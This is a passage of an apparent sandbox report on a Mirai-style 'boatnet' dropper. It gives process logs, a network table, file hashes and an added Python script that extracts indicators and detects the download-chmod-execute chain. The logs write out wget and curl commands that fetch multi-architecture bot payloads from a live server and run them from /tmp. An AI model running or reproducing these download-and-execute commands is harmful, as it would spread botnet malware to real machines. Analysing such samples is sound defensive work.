[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-b0ba3c39e388473493190d0bc311c436-systemd-timedated.service-HXNtFo WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:3778 | | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
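The Processes list above is the stager's download loop written out one architecture at a time (wget and curl both try the same URL, `cat` copies the payload, `chmod +x` marks it, `./WTF` runs it), and the Network table shows one server used two ways: payload fetches over tcp/80 and a separate session on tcp/3778. The following Python is an added example, not part of this report or of the sandbox that produced it: it pulls indicators out of records shaped like those two tables and flags the downloader, then `chmod +x`, then exec-from-/tmp chain. The sample records are constructed from the report's own lines (the chmod argv is abbreviated); the `DOWNLOADERS` set and the rule that a non-HTTP port on the distribution host is a C2 candidate are assumptions, not something the report states.

```python
"""IOC extraction and download->chmod->exec chain detection for a
Mirai-style multi-arch dropper. Added example; sample data is constructed
from the sandbox report's Processes and Network tables."""
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed sample: (process path, command line) as the report lists them.
# chmod argv abbreviated; three of the report's fifteen rounds are shown.
PROCESSES = [
    ("/tmp/ohshit.sh", "/tmp/ohshit.sh"),
    ("/usr/bin/wget", "wget http://77.221.151.63/hiddenbin/boatnet.x86"),
    ("/usr/bin/curl", "curl -O http://77.221.151.63/hiddenbin/boatnet.x86"),
    ("/bin/cat", "cat boatnet.x86"),
    ("/bin/chmod", "chmod +x boatnet.x86 ohshit.sh WTF"),
    ("/tmp/WTF", "./WTF"),
    ("/usr/bin/wget", "wget http://77.221.151.63/hiddenbin/boatnet.mips"),
    ("/usr/bin/curl", "curl -O http://77.221.151.63/hiddenbin/boatnet.mips"),
    ("/bin/cat", "cat boatnet.mips"),
    ("/bin/chmod", "chmod +x boatnet.mips boatnet.x86 ohshit.sh WTF"),
    ("/tmp/WTF", "./WTF"),
    ("/usr/bin/wget", "wget http://77.221.151.63/hiddenbin/boatnet.arm7"),
    ("/usr/bin/curl", "curl -O http://77.221.151.63/hiddenbin/boatnet.arm7"),
    ("/bin/cat", "cat boatnet.arm7"),
    ("/bin/chmod", "chmod +x boatnet.arm7 boatnet.mips boatnet.x86 ohshit.sh WTF"),
    ("/tmp/WTF", "./WTF"),
]

# Constructed sample: the Destination column of the Network table.
CONNECTIONS = [
    "77.221.151.63:80", "77.221.151.63:80", "77.221.151.63:3778",
    "77.221.151.63:80", "77.221.151.63:3778", "77.221.151.63:80",
]

URL_RE = re.compile(r"https?://[^\s'\"]+")
# Assumption: the fetch tools a stager of this kind is likely to call.
DOWNLOADERS = {"/usr/bin/wget", "/usr/bin/curl", "/usr/bin/tftp", "/usr/bin/ftpget"}


def extract_urls(processes):
    """Every URL passed to a downloader process, de-duplicated and sorted."""
    urls = set()
    for path, cmdline in processes:
        if path in DOWNLOADERS:
            urls.update(URL_RE.findall(cmdline))
    return sorted(urls)


def payload_arches(urls):
    """Architecture suffixes of the fetched payloads (boatnet.x86 -> x86)."""
    names = [urlparse(u).path.rsplit("/", 1)[-1] for u in urls]
    return sorted({n.split(".", 1)[1] for n in names if "." in n})


def distribution_servers(urls):
    """host:port the stager pulls payloads from (scheme default when no port)."""
    out = set()
    for u in urls:
        p = urlparse(u)
        out.add(f"{p.hostname}:{p.port or (443 if p.scheme == 'https' else 80)}")
    return sorted(out)


def summarize_connections(destinations):
    """Connection counts per ip:port, plus C2 candidates.
    Heuristic (assumption): payloads come over HTTP, the bot session
    to the C2 sits on some other port on the same infrastructure."""
    counts = Counter(destinations)
    c2 = sorted(d for d in counts if int(d.rsplit(":", 1)[1]) not in (80, 443))
    return counts, c2


def detect_download_exec_chains(processes, window=6):
    """Downloader -> chmod +x -> exec-from-/tmp within `window` records.
    The rename between download and exec (the report only shows
    'cat boatnet.x86'; a shell redirection is not part of argv) is
    invisible here, so the chain is keyed on chmod and exec, not on
    the file name. Each exec record is reported once."""
    hits, seen = [], set()
    for i, (path, cmdline) in enumerate(processes):
        if path not in DOWNLOADERS:
            continue
        urls = URL_RE.findall(cmdline)
        if not urls:
            continue
        tail = processes[i + 1:i + 1 + window]
        chmod_at = next((j for j, (p, c) in enumerate(tail)
                         if p.endswith("/chmod") and "+x" in c.split()), None)
        if chmod_at is None:
            continue
        for k, (p, c) in enumerate(tail[chmod_at + 1:], start=i + 2 + chmod_at):
            if p.startswith("/tmp/") and c.startswith("./"):
                if k not in seen:
                    seen.add(k)
                    hits.append({"url": urls[0], "chmod": tail[chmod_at][1], "exec": p})
                break
    return hits


if __name__ == "__main__":
    urls = extract_urls(PROCESSES)
    counts, c2 = summarize_connections(CONNECTIONS)
    print("payload URLs:", urls)
    print("arches:", payload_arches(urls))
    print("distribution:", distribution_servers(urls))
    print("connections:", dict(counts), "C2 candidates:", c2)
    for hit in detect_download_exec_chains(PROCESSES):
        print("chain:", hit)
```

Keying the rule on the chain rather than on names matters for this sample: every round executes the same path, `/tmp/WTF`, and the Files section lists six different hashes under that one path, so a hash or path list covers only whichever payload happened to be written last. The distribution host and the tcp/3778 session are the stable indicators here.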
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
memory/839-1-0x00400000-0x00452a58-memory.dmp